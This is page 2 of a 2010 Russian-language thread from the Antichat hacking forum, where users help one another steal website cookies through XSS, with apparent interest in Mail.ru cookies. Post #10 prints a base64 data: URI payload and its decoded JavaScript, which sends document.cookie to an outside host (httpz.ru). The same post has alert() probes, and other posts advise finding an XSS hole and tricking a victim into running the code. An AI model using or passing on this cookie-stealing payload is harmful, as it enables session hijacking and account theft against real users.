ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу куки
   
 
Страница 2 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.03.2010, 18:37
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию
Ты видимо не правильный запрос вписал
 

  #2  
Старый 09.03.2010, 18:27
Alk@sh
Новичок
Регистрация: 05.07.2009
Сообщений: 29
Провел на форуме:
489621

Репутация: 18
Отправить сообщение для Alk@sh с помощью ICQ
По умолчанию
самое главное тебе надо найти xss
 

  #3  
Старый 09.03.2010, 18:28
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию
я мейловские куки глянул, они большие, да и видео когда смотрел там большие
 

  #4  
Старый 09.03.2010, 18:31
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию
точнее так можно)
 

  #5  
Старый 09.03.2010, 18:47
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию
а как по правильно? открой тайну)
 

  #6  
Старый 09.03.2010, 18:50
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию
в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
 

  #7  
Старый 09.03.2010, 18:58
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
Цитата:
в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
Неважно с откуда они передаются, я о том это зависит от программиста который сам решает что ему писать в кукисы. Я уж незнаю есть ли там у тебя xss или нет если всеже нет то то заставь вставить твой код в адресную строку при открытой странице.
 

  #8  
Старый 10.03.2010, 07:40
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию
то есть сначало нужно найти xss, а потом отправлять) спс)
 

  #9  
Старый 10.03.2010, 15:16
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию
и все-таки не догоняю...
 

  #10  
Старый 10.03.2010, 15:20
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию
вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться
 
 
Страница 2 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ